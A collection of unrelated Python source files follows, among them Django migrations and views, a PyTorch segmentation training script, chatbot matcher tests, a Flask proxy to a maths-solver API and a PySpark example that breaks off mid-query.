'cp.cuda.Event', ([], {}), '()\n', (3713, 3715), True, 'import cupy as cp\n'), ((3754, 3816), 'tomo_encoders.reconstruction.recon.recon_patches_3d', 'recon_patches_3d', (['projs', 'theta', 'center', 'p_surf'], {'apply_fbp': '(True)'}), '(projs, theta, center, p_surf, apply_fbp=True)\n', (3770, 3816), False, 'from tomo_encoders.reconstruction.recon import recon_patches_3d\n'), ((3911, 3952), 'cupy.cuda.get_elapsed_time', 'cp.cuda.get_elapsed_time', (['st_rec', 'end_rec'], {}), '(st_rec, end_rec)\n', (3935, 3952), True, 'import cupy as cp\n'), ((3965, 3980), 'cupy.cuda.Event', 'cp.cuda.Event', ([], {}), '()\n', (3978, 3980), True, 'import cupy as cp\n'), ((3992, 4007), 'cupy.cuda.Event', 'cp.cuda.Event', ([], {}), '()\n', (4005, 4007), True, 'import cupy as cp\n'), ((4043, 4068), 'numpy.clip', 'np.clip', (['x_surf', '*min_max'], {}), '(x_surf, *min_max)\n', (4050, 4068), True, 'import numpy as np\n'), ((4228, 4269), 'cupy.cuda.get_elapsed_time', 'cp.cuda.get_elapsed_time', (['st_seg', 'end_seg'], {}), '(st_seg, end_seg)\n', (4252, 4269), True, 'import cupy as cp\n'), ((2524, 2549), 'numpy.std', 'np.std', (['x'], {'axis': '(1, 2, 3)'}), '(x, axis=(1, 2, 3))\n', (2530, 2549), True, 'import numpy as np\n'), ((2878, 2905), 'numpy.prod', 'np.prod', (['p3d_surf.vol_shape'], {}), '(p3d_surf.vol_shape)\n', (2885, 2905), True, 'import numpy as np\n'), ((652, 674), 'cupy.ceil', 'cp.ceil', (['(shape_yx // 2)'], {}), '(shape_yx // 2)\n', (659, 674), True, 'import cupy as cp\n'), ((1240, 1262), 'cupy.ceil', 'cp.ceil', (['(shape_yx // 2)'], {}), '(shape_yx // 2)\n', (1247, 1262), True, 'import cupy as cp\n'), ((2572, 2597), 'numpy.sum', 'np.sum', (['x'], {'axis': '(1, 2, 3)'}), '(x, axis=(1, 2, 3))\n', (2578, 2597), True, 'import numpy as np\n'), ((2629, 2654), 'numpy.sum', 'np.sum', (['x'], {'axis': '(1, 2, 3)'}), '(x, axis=(1, 2, 3))\n', (2635, 2654), True, 'import numpy as np\n'), ((739, 765), 'cupy.sqrt', 'cp.sqrt', (['(yy ** 2 + xx ** 2)'], {}), '(yy ** 2 + xx ** 2)\n', (746, 765), True, 'import cupy as cp\n'), ((1327, 1353), 'cupy.sqrt', 'cp.sqrt', (['(yy ** 2 + xx ** 2)'], {}), '(yy ** 2 + xx ** 2)\n', (1334, 1353), True, 'import cupy as cp\n')] |
# Generated by Django 2.2.1 on 2019-06-22 11:03
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='SubscribeModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(db_index=True, max_length=255, unique=True, verbose_name='Email')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Subscribe Time')),
],
options={
'verbose_name': 'Subscribe Email',
'verbose_name_plural': 'Subscribe Emails',
'abstract': False,
},
),
]
| [
"django.db.models.DateTimeField",
"django.db.models.EmailField",
"django.db.models.AutoField"
]
| [((310, 403), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (326, 403), False, 'from django.db import migrations, models\n'), ((428, 516), 'django.db.models.EmailField', 'models.EmailField', ([], {'db_index': '(True)', 'max_length': '(255)', 'unique': '(True)', 'verbose_name': '"""Email"""'}), "(db_index=True, max_length=255, unique=True, verbose_name=\n 'Email')\n", (445, 516), False, 'from django.db import migrations, models\n'), ((546, 616), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Subscribe Time"""'}), "(auto_now_add=True, verbose_name='Subscribe Time')\n", (566, 616), False, 'from django.db import migrations, models\n')] |
# -*- coding: UTF-8 -*-
import json
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
import tushare as ts
from .publiceClass import DateEncoder
@csrf_exempt
def sh_margins(request):
try:
start = request.POST.get('start','')#选填
end = request.POST.get('end','')#选填
data = ts.sh_margins(start,end)
res = {'columns':[
'信用交易日期',
'本日融资余额(元)',
'本日融资买入额(元)',
'本日融券余量',
'本日融券余量金额(元)',
'本日融券卖出量',
'本日融资融券余额(元)'
],'data':json.loads(json.dumps(data.values,cls=DateEncoder))}
except(BaseException):
return HttpResponse(BaseException)
else:
return HttpResponse(json.dumps(res),content_type="application/json")
| [
"django.http.HttpResponse",
"json.dumps",
"tushare.sh_margins"
]
| [((341, 366), 'tushare.sh_margins', 'ts.sh_margins', (['start', 'end'], {}), '(start, end)\n', (354, 366), True, 'import tushare as ts\n'), ((676, 703), 'django.http.HttpResponse', 'HttpResponse', (['BaseException'], {}), '(BaseException)\n', (688, 703), False, 'from django.http import HttpResponse\n'), ((743, 758), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (753, 758), False, 'import json\n'), ((592, 632), 'json.dumps', 'json.dumps', (['data.values'], {'cls': 'DateEncoder'}), '(data.values, cls=DateEncoder)\n', (602, 632), False, 'import json\n')] |
# Generated by Django 3.1.4 on 2021-05-05 21:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Main', '0071_auto_20210506_0004'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='chooseColor',
),
migrations.RemoveField(
model_name='product',
name='chooseSize',
),
]
| [
"django.db.migrations.RemoveField"
]
| [((224, 288), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""product"""', 'name': '"""chooseColor"""'}), "(model_name='product', name='chooseColor')\n", (246, 288), False, 'from django.db import migrations\n'), ((333, 396), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""product"""', 'name': '"""chooseSize"""'}), "(model_name='product', name='chooseSize')\n", (355, 396), False, 'from django.db import migrations\n')] |
import json
import setuptools
with open("template/README.md", "r") as fh:
long_description = fh.read()
with open('requirements.txt') as fr:
requirements = fr.read().strip().split('\n')
with open('metadata.json') as fr:
metadata = json.load(fr)
setuptools.setup(
name="", # Name of the repository
version="0.0.1",
author=metadata.get("author", ""),
author_email=metadata.get("author_email", ""),
description=metadata.get("description", ""),
long_description=long_description,
long_description_content_type="text/markdown",
url="", # Repository URL or externally maintained page
packages=setuptools.find_packages(),
python_requires='>=3.6',
install_requires=requirements,
)
| [
"json.load",
"setuptools.find_packages"
]
| [((245, 258), 'json.load', 'json.load', (['fr'], {}), '(fr)\n', (254, 258), False, 'import json\n'), ((640, 666), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (664, 666), False, 'import setuptools\n')] |
"""
@Time : 201/21/19 10:41
@Author : TaylorMei
@Email : <EMAIL>
@Project : iccv
@File : train_base3.py
@Function:
"""
import datetime
import os
import torch
from torch import nn
from torch import optim
from torch.autograd import Variable
from torch.backends import cudnn
from torch.utils.data import DataLoader
from torchvision import transforms
from tensorboardX import SummaryWriter
from tqdm import tqdm
import joint_transforms
from config import msd_training_root
from config import backbone_path
from dataset import ImageFolder
from misc import AvgMeter, check_mkdir
from model.base3 import BASE3
import loss as L
cudnn.benchmark = True
device_ids = [2]
ckpt_path = './ckpt'
exp_name = 'BASE3'
args = {
'epoch_num': 100,
'train_batch_size': 14,
'last_epoch': 0,
'lr': 5e-3,
'lr_decay': 0.9,
'weight_decay': 5e-4,
'momentum': 0.9,
'snapshot': '',
'scale': 384,
'save_point': [60, 80, 90],
'add_graph': True,
'poly_train': True,
'optimizer': 'SGD'
}
# Path.
check_mkdir(ckpt_path)
check_mkdir(os.path.join(ckpt_path, exp_name))
vis_path = os.path.join(ckpt_path, exp_name, 'log')
check_mkdir(vis_path)
log_path = os.path.join(ckpt_path, exp_name, str(datetime.datetime.now()) + '.txt')
writer = SummaryWriter(log_dir=vis_path, comment=exp_name)
# Transform Data.
joint_transform = joint_transforms.Compose([
joint_transforms.RandomRotate(),
joint_transforms.Resize((args['scale'], args['scale']))
])
img_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # maybe can optimized.
])
target_transform = transforms.ToTensor()
# Prepare Data Set.
train_set = ImageFolder(msd_training_root, joint_transform, img_transform, target_transform)
print("Train set: {}".format(train_set.__len__()))
train_loader = DataLoader(train_set, batch_size=args['train_batch_size'], num_workers=0, shuffle=True)
def main():
print(args)
print(exp_name)
net = BASE3(backbone_path).cuda(device_ids[0]).train()
if args['add_graph']:
writer.add_graph(net, input_to_model=torch.rand(
args['train_batch_size'], 3, args['scale'], args['scale']).cuda(device_ids[0]))
if args['optimizer'] == 'Adam':
print("Adam")
optimizer = optim.Adam([
{'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'],
'lr': 2 * args['lr']},
{'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'],
'lr': 1 * args['lr'], 'weight_decay': args['weight_decay']}
])
else:
print("SGD")
optimizer = optim.SGD([
{'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'],
'lr': 2 * args['lr']},
{'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'],
'lr': 1 * args['lr'], 'weight_decay': args['weight_decay']}
], momentum=args['momentum'])
if len(args['snapshot']) > 0:
print('Training Resumes From \'%s\'' % args['snapshot'])
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
net = nn.DataParallel(net, device_ids=device_ids)
print("Using {} GPU(s) to Train.".format(len(device_ids)))
open(log_path, 'w').write(str(args) + '\n\n')
train(net, optimizer)
writer.close()
def train(net, optimizer):
curr_iter = 1
for epoch in range(args['last_epoch'] + 1, args['last_epoch'] + 1 + args['epoch_num']):
loss_4_record, loss_3_record, loss_2_record, loss_1_record, \
loss_f_record, loss_record = AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter()
train_iterator = tqdm(train_loader, total=len(train_loader))
for data in train_iterator:
if args['poly_train']:
base_lr = args['lr'] * (1 - float(curr_iter) / (args['epoch_num'] * len(train_loader))) ** args[
'lr_decay']
optimizer.param_groups[0]['lr'] = 2 * base_lr
optimizer.param_groups[1]['lr'] = 1 * base_lr
inputs, labels = data
batch_size = inputs.size(0)
inputs = Variable(inputs).cuda(device_ids[0])
labels = Variable(labels).cuda(device_ids[0])
optimizer.zero_grad()
predict_4, predict_3, predict_2, predict_1, predict_f = net(inputs)
loss_4 = L.lovasz_hinge(predict_4, labels)
loss_3 = L.lovasz_hinge(predict_3, labels)
loss_2 = L.lovasz_hinge(predict_2, labels)
loss_1 = L.lovasz_hinge(predict_1, labels)
loss_f = L.lovasz_hinge(predict_f, labels)
loss = loss_4 + loss_3 + loss_2 + loss_1 + loss_f
loss.backward()
optimizer.step()
loss_record.update(loss.data, batch_size)
loss_4_record.update(loss_4.data, batch_size)
loss_3_record.update(loss_3.data, batch_size)
loss_2_record.update(loss_2.data, batch_size)
loss_1_record.update(loss_1.data, batch_size)
loss_f_record.update(loss_f.data, batch_size)
if curr_iter % 50 == 0:
writer.add_scalar('loss', loss, curr_iter)
writer.add_scalar('loss_4', loss_4, curr_iter)
writer.add_scalar('loss_3', loss_3, curr_iter)
writer.add_scalar('loss_2', loss_2, curr_iter)
writer.add_scalar('loss_1', loss_1, curr_iter)
writer.add_scalar('loss_f', loss_f, curr_iter)
log = '[%3d], [%6d], [%.6f], [%.5f], [L4: %.5f], [L3: %.5f], [L2: %.5f], [L1: %.5f], [Lf: %.5f]' % \
(epoch, curr_iter, base_lr, loss_record.avg, loss_4_record.avg, loss_3_record.avg, loss_2_record.avg,
loss_1_record.avg, loss_f_record.avg)
train_iterator.set_description(log)
open(log_path, 'a').write(log + '\n')
curr_iter += 1
if epoch in args['save_point']:
net.cpu()
torch.save(net.module.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % epoch))
net.cuda(device_ids[0])
if epoch >= args['epoch_num']:
net.cpu()
torch.save(net.module.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % epoch))
print("Optimization Have Done!")
return
if __name__ == '__main__':
main()
| [
"dataset.ImageFolder",
"joint_transforms.RandomRotate",
"loss.lovasz_hinge",
"tensorboardX.SummaryWriter",
"misc.AvgMeter",
"model.base3.BASE3",
"os.path.join",
"torch.nn.DataParallel",
"joint_transforms.Resize",
"datetime.datetime.now",
"torchvision.transforms.Normalize",
"torch.utils.data.DataLoader",
"misc.check_mkdir",
"torchvision.transforms.ToTensor",
"torch.autograd.Variable",
"torch.rand"
]
| [((1041, 1063), 'misc.check_mkdir', 'check_mkdir', (['ckpt_path'], {}), '(ckpt_path)\n', (1052, 1063), False, 'from misc import AvgMeter, check_mkdir\n'), ((1122, 1162), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name', '"""log"""'], {}), "(ckpt_path, exp_name, 'log')\n", (1134, 1162), False, 'import os\n'), ((1163, 1184), 'misc.check_mkdir', 'check_mkdir', (['vis_path'], {}), '(vis_path)\n', (1174, 1184), False, 'from misc import AvgMeter, check_mkdir\n'), ((1278, 1327), 'tensorboardX.SummaryWriter', 'SummaryWriter', ([], {'log_dir': 'vis_path', 'comment': 'exp_name'}), '(log_dir=vis_path, comment=exp_name)\n', (1291, 1327), False, 'from tensorboardX import SummaryWriter\n'), ((1673, 1694), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1692, 1694), False, 'from torchvision import transforms\n'), ((1728, 1813), 'dataset.ImageFolder', 'ImageFolder', (['msd_training_root', 'joint_transform', 'img_transform', 'target_transform'], {}), '(msd_training_root, joint_transform, img_transform, target_transform\n )\n', (1739, 1813), False, 'from dataset import ImageFolder\n'), ((1875, 1966), 'torch.utils.data.DataLoader', 'DataLoader', (['train_set'], {'batch_size': "args['train_batch_size']", 'num_workers': '(0)', 'shuffle': '(True)'}), "(train_set, batch_size=args['train_batch_size'], num_workers=0,\n shuffle=True)\n", (1885, 1966), False, 'from torch.utils.data import DataLoader\n'), ((1076, 1109), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name'], {}), '(ckpt_path, exp_name)\n', (1088, 1109), False, 'import os\n'), ((3267, 3310), 'torch.nn.DataParallel', 'nn.DataParallel', (['net'], {'device_ids': 'device_ids'}), '(net, device_ids=device_ids)\n', (3282, 3310), False, 'from torch import nn\n'), ((1396, 1427), 'joint_transforms.RandomRotate', 'joint_transforms.RandomRotate', ([], {}), '()\n', (1425, 1427), False, 'import joint_transforms\n'), ((1433, 1488), 'joint_transforms.Resize', 'joint_transforms.Resize', (["(args['scale'], args['scale'])"], {}), "((args['scale'], args['scale']))\n", (1456, 1488), False, 'import joint_transforms\n'), ((1533, 1554), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1552, 1554), False, 'from torchvision import transforms\n'), ((1560, 1626), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (1580, 1626), False, 'from torchvision import transforms\n'), ((1234, 1257), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1255, 1257), False, 'import datetime\n'), ((3717, 3727), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3725, 3727), False, 'from misc import AvgMeter, check_mkdir\n'), ((3729, 3739), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3737, 3739), False, 'from misc import AvgMeter, check_mkdir\n'), ((3741, 3751), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3749, 3751), False, 'from misc import AvgMeter, check_mkdir\n'), ((3753, 3763), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3761, 3763), False, 'from misc import AvgMeter, check_mkdir\n'), ((3765, 3775), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3773, 3775), False, 'from misc import AvgMeter, check_mkdir\n'), ((3777, 3787), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3785, 3787), False, 'from misc import AvgMeter, check_mkdir\n'), ((4527, 4560), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_4', 'labels'], {}), '(predict_4, labels)\n', (4541, 4560), True, 'import loss as L\n'), ((4582, 4615), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_3', 'labels'], {}), '(predict_3, labels)\n', (4596, 4615), True, 'import loss as L\n'), ((4637, 4670), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_2', 'labels'], {}), '(predict_2, labels)\n', (4651, 4670), True, 'import loss as L\n'), ((4692, 4725), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_1', 'labels'], {}), '(predict_1, labels)\n', (4706, 4725), True, 'import loss as L\n'), ((4747, 4780), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_f', 'labels'], {}), '(predict_f, labels)\n', (4761, 4780), True, 'import loss as L\n'), ((3193, 3253), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name', "(args['snapshot'] + '.pth')"], {}), "(ckpt_path, exp_name, args['snapshot'] + '.pth')\n", (3205, 3253), False, 'import os\n'), ((6187, 6238), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name', "('%d.pth' % epoch)"], {}), "(ckpt_path, exp_name, '%d.pth' % epoch)\n", (6199, 6238), False, 'import os\n'), ((6386, 6437), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name', "('%d.pth' % epoch)"], {}), "(ckpt_path, exp_name, '%d.pth' % epoch)\n", (6398, 6437), False, 'import os\n'), ((2024, 2044), 'model.base3.BASE3', 'BASE3', (['backbone_path'], {}), '(backbone_path)\n', (2029, 2044), False, 'from model.base3 import BASE3\n'), ((4294, 4310), 'torch.autograd.Variable', 'Variable', (['inputs'], {}), '(inputs)\n', (4302, 4310), False, 'from torch.autograd import Variable\n'), ((4352, 4368), 'torch.autograd.Variable', 'Variable', (['labels'], {}), '(labels)\n', (4360, 4368), False, 'from torch.autograd import Variable\n'), ((2144, 2213), 'torch.rand', 'torch.rand', (["args['train_batch_size']", '(3)', "args['scale']", "args['scale']"], {}), "(args['train_batch_size'], 3, args['scale'], args['scale'])\n", (2154, 2213), False, 'import torch\n')] |
import unittest
from app.models import Comment, Pitch
from app import db
class TestPitchComment(unittest.TestCase):
def setUp(self):
self.new_pitch = Pitch(post = "doit", category='Quotes')
self.new_comment = Comment(comment = "good comment", pitch=self.new_pitch)
def test_instance(self):
self.assertTrue(isinstance(self.new_comment,Comment))
def test_check_instance_variables(self):
self.assertEquals(self.new_comment.comment,"good comment")
self.assertEquals(self.new_comment.pitch,self.new_pitch, 'do it') | [
"app.models.Comment",
"app.models.Pitch"
]
| [((164, 201), 'app.models.Pitch', 'Pitch', ([], {'post': '"""doit"""', 'category': '"""Quotes"""'}), "(post='doit', category='Quotes')\n", (169, 201), False, 'from app.models import Comment, Pitch\n'), ((231, 284), 'app.models.Comment', 'Comment', ([], {'comment': '"""good comment"""', 'pitch': 'self.new_pitch'}), "(comment='good comment', pitch=self.new_pitch)\n", (238, 284), False, 'from app.models import Comment, Pitch\n')] |
from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from django.template import loader
from django.db import connection
from django.http import HttpResponseRedirect
import datetime
from django.http import JsonResponse
from administrator.models import Course, CourseTeacher, CourseStudent, Student
from django.core.exceptions import PermissionDenied
def teacher_only(function):
#"""Limit view to teacher only."""
def _inner(request, *args, **kwargs):
if not request.user.is_staff == False | request.user.is_superuser:
raise PermissionDenied
return function(request, *args, **kwargs)
return _inner
@login_required(login_url = '/users')
@teacher_only
def home(request):
current_user = request.user.id
teacher_current_courses = Course.objects.select_related().raw('SELECT * '
'FROM course_teachers as CT, courses as C '
'WHERE CT.teachers_id = %s AND C.course_id = CT.course_id AND C.is_complete = 0 ', [current_user])
currentdate = datetime.datetime.today().strftime('%Y-%m-%d')
with connection.cursor() as cursor:
cursor.execute('SELECT CL.course_id, CL.date '
'FROM classes as CL, course_teachers as CT '
'WHERE CT.teachers_id = %s AND CL.date >= %s '
'AND CT.course_id = CL.course_id '
'GROUP BY CL.course_id ', [current_user, currentdate])
next_class_date = cursor.fetchall()
with connection.cursor() as cursor:
cursor.execute('SELECT CS.course_id, COUNT(CS.students_id) '
'FROM course_teachers as CT, course_students as CS '
'WHERE CT.teachers_id = %s AND CT.course_id = CS.course_id '
'GROUP BY CS.course_id ', [current_user])
teacher_student_count = cursor.fetchall()
with connection.cursor() as cursor:
cursor.execute('SELECT C.course_id, C.notes '
'FROM course_teachers as CT, courses as C '
'WHERE CT.teachers_id = %s AND C.course_id = CT.course_id '
'GROUP BY CT.course_id ', [current_user])
teacher_course_notes = cursor.fetchall()
template = loader.get_template('teacher/dashboard.html')
context = {
'teacher_current_courses': teacher_current_courses,
'teacher_student_count': teacher_student_count,
'next_class_date': next_class_date,
'teacher_course_notes': teacher_course_notes
}
# Render the template to the user
return HttpResponse(template.render(context, request))
@csrf_exempt
def update_course_notes(request):
# Get the student name that was passed from the web page
courseNotes = request.POST.get('courseNotes')
courseId = request.POST.get('courseId')
# Create a cursor to execute raw SQL queries.
with connection.cursor() as cursor:
cursor.execute('UPDATE courses '
'SET notes = %s '
'WHERE course_id = %s', [courseNotes, courseId])
# Render the response to the user
| [
"django.db.connection.cursor",
"django.contrib.auth.decorators.login_required",
"datetime.datetime.today",
"django.template.loader.get_template",
"administrator.models.Course.objects.select_related"
]
| [((776, 810), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/users"""'}), "(login_url='/users')\n", (790, 810), False, 'from django.contrib.auth.decorators import login_required\n'), ((2666, 2711), 'django.template.loader.get_template', 'loader.get_template', (['"""teacher/dashboard.html"""'], {}), "('teacher/dashboard.html')\n", (2685, 2711), False, 'from django.template import loader\n'), ((1306, 1325), 'django.db.connection.cursor', 'connection.cursor', ([], {}), '()\n', (1323, 1325), False, 'from django.db import connection\n'), ((1789, 1808), 'django.db.connection.cursor', 'connection.cursor', ([], {}), '()\n', (1806, 1808), False, 'from django.db import connection\n'), ((2197, 2216), 'django.db.connection.cursor', 'connection.cursor', ([], {}), '()\n', (2214, 2216), False, 'from django.db import connection\n'), ((3355, 3374), 'django.db.connection.cursor', 'connection.cursor', ([], {}), '()\n', (3372, 3374), False, 'from django.db import connection\n'), ((919, 950), 'administrator.models.Course.objects.select_related', 'Course.objects.select_related', ([], {}), '()\n', (948, 950), False, 'from administrator.models import Course, CourseTeacher, CourseStudent, Student\n'), ((1245, 1270), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1268, 1270), False, 'import datetime\n')] |
import logging
import pytest
import re
from . import text
from ... import matchers
from ...utils import answer, SimpleTrigger
logger = logging.getLogger(__name__)
@pytest.mark.asyncio
async def test_should_run_story_on_equal_message():
trigger = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on('hi there!')
def one_story():
@story.part()
def then(ctx):
trigger.passed()
await talk.pure_text('hi there!')
assert trigger.is_triggered
@pytest.mark.asyncio
async def test_should_not_run_story_on_non_equal_message():
trigger = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on('hi there!')
def one_story():
@story.part()
def then(ctx):
trigger.passed()
await talk.pure_text('buy!')
assert not trigger.is_triggered
@pytest.mark.asyncio
async def test_should_catch_any_text_message():
trigger = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Any())
def one_story():
@story.part()
def then(ctx):
trigger.passed()
await talk.pure_text('hi there!')
assert trigger.is_triggered
@pytest.mark.asyncio
async def test_should_ignore_any_non_text_message():
trigger = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Any())
def one_story():
@story.part()
def then(ctx):
trigger.passed()
await talk.location('some where')
assert not trigger.is_triggered
def test_serialize_text_any():
m_old = text.Any()
m_new = matchers.deserialize(matchers.serialize(m_old))
assert isinstance(m_new, text.Any)
@pytest.mark.asyncio
async def test_should_catch_equal_text_message():
trigger_hi_there = SimpleTrigger()
trigger_see_you = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Equal('hi there!'))
def first_story():
@story.part()
def then(ctx):
trigger_hi_there.passed()
@story.on(text.Equal('see you!'))
def second_story():
@story.part()
def then(ctx):
trigger_see_you.passed()
await talk.pure_text('see you!')
assert not trigger_hi_there.is_triggered
assert trigger_see_you.is_triggered
def test_equal_handle_should_create_right_type():
assert isinstance(text.Equal.handle(''), text.Equal)
def test_serialize_text_equal():
m_old = text.Equal('hats off')
m_new = matchers.deserialize(matchers.serialize(m_old))
assert isinstance(m_new, text.Equal)
assert m_new.test_string == 'hats off'
@pytest.mark.asyncio
async def test_should_catch_equal_text_message_case_in_sensitive():
trigger_hi_there = SimpleTrigger()
trigger_see_you = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.EqualCaseIgnore('hi there!'))
def first_story():
@story.part()
def then(ctx):
trigger_hi_there.passed()
@story.on(text.EqualCaseIgnore('see you!'))
def second_story():
@story.part()
def then(ctx):
trigger_see_you.passed()
await talk.pure_text('See You!')
assert not trigger_hi_there.is_triggered
assert trigger_see_you.is_triggered
def test_serialize_text_equal_case_ignore():
m_old = text.EqualCaseIgnore('hats off')
m_new = matchers.deserialize(matchers.serialize(m_old))
assert isinstance(m_new, text.EqualCaseIgnore)
assert m_new.test_string == 'hats off'
@pytest.mark.asyncio
async def test_should_catch_text_message_that_match_regex():
trigger_buy = SimpleTrigger()
trigger_sell = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Match('buy (.*)btc'))
def one_story():
@story.part()
def then(ctx):
trigger_buy.receive(text.get_text(ctx)['matches'][0])
@story.on(text.Match('sell (.*)btc'))
def another_story():
@story.part()
def then(ctx):
trigger_sell.receive(text.get_text(ctx)['matches'][0])
await talk.pure_text('buy 700btc')
await talk.pure_text('sell 600btc')
assert trigger_buy.result() == '700'
assert trigger_sell.result() == '600'
@pytest.mark.asyncio
async def test_should_catch_text_message_that_match_regex_with_flags():
trigger_destination = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Match('going to (.*)', re.IGNORECASE))
def one_story():
@story.part()
def then(ctx):
logger.debug('ctx')
logger.debug(ctx)
trigger_destination.receive(text.get_text(ctx)['matches'][0])
await talk.pure_text('Going to Pripyat')
assert trigger_destination.result() == 'Pripyat'
@pytest.mark.asyncio
async def test_should_not_fail_on_empty_message():
with answer.Talk() as talk:
story = talk.story
@story.on(text.Match('going to (.*)', re.IGNORECASE))
def one_story():
@story.part()
def then(ctx):
pass
await talk.ask(None)
def test_serialize_text_match():
m_old = text.Match('hello (.*)', re.IGNORECASE)
m_new = matchers.deserialize(matchers.serialize(m_old))
assert isinstance(m_new, text.Match)
assert m_new.matcher.match('Hello Piter!')
def test_text_qual_should_handle_text():
assert isinstance(matchers.get_validator('just pure text'), text.Equal)
| [
"logging.getLogger"
]
| [((136, 163), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (153, 163), False, 'import logging\n')] |
from flask import Flask
from flask import render_template, request
from flask import jsonify
import requests
import json
app = Flask(__name__)
@app.route("/symbo",methods=['POST'])
def symbo():
#import pdb; pdb.set_trace()
session = requests.session()
token = session.get("https://es.symbolab.com/solver/step-by-step/x%5E%7B2%7D?or=input").cookies.get_dict()["sy2.pub.token"]
query = request.json["expression"]
#response = json.loads(session.get(f"https://es.symbolab.com/pub_api/steps?subscribed=true&origin=input&language=es&query=%5Cint+tcos%5Cleft(nt%5Cright)dt+&referer=https%3A%2F%2Fes.symbolab.com%2Fsolver%2Fstep-by-step%2F%255Cint_%257B%2520%257Dtcos%255Cleft(nt%255Cright)dt%2520%3For%3Dinput&plotRequest=PlotOptional&page=step-by-step",headers={
response = json.loads(session.get(f"https://es.symbolab.com/pub_api/steps?subscribed=true&origin=input&language=es&query={query}",headers={
"x-requested-with":"XMLHttpRequest",
"authorization":f"Bearer {token}"
}).content)
return {
"dym":response["dym"],
"solutions":response["solutions"]
}
@app.route('/')
def hello():
return render_template('index.html')
app.run(debug=True) | [
"flask.render_template",
"requests.session",
"flask.Flask"
]
| [((128, 143), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (133, 143), False, 'from flask import Flask\n'), ((244, 262), 'requests.session', 'requests.session', ([], {}), '()\n', (260, 262), False, 'import requests\n'), ((1160, 1189), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (1175, 1189), False, 'from flask import render_template, request\n')] |
from pyspark.sql import SparkSession
# spark = SparkSession.builder.master("local[*]").getOrCreate()
spark = SparkSession.builder.getOrCreate()
file_path = "C:\home_work\local_github\Spark-The-Definitive-Guide\data\/flight-data\csv\/2015-summary.csv"
# COMMAND ----------
# COMMAND ----------
flightData2015 = spark\
.read\
.option("inferSchema", "true")\
.option("header", "true")\
.csv("./data/flight-data/csv/2015-summary.csv")
# COMMAND ----------
flightData2015.createOrReplaceTempView("flight_data_2015")
# COMMAND ----------
sqlWay = spark.sql("""
SELECT DEST_COUNTRY_NAME, count(1)
FROM flight_data_2015
GROUP BY DEST_COUNTRY_NAME
""")
dataFrameWay = flightData2015\
.groupBy("DEST_COUNTRY_NAME")\
.count()
sqlWay.explain()
dataFrameWay.explain()
# COMMAND ----------
from pyspark.sql.functions import max, col
#
flightData2015.select(max(col("count"))).show(1)
# COMMAND ----------
maxSql = spark.sql("""
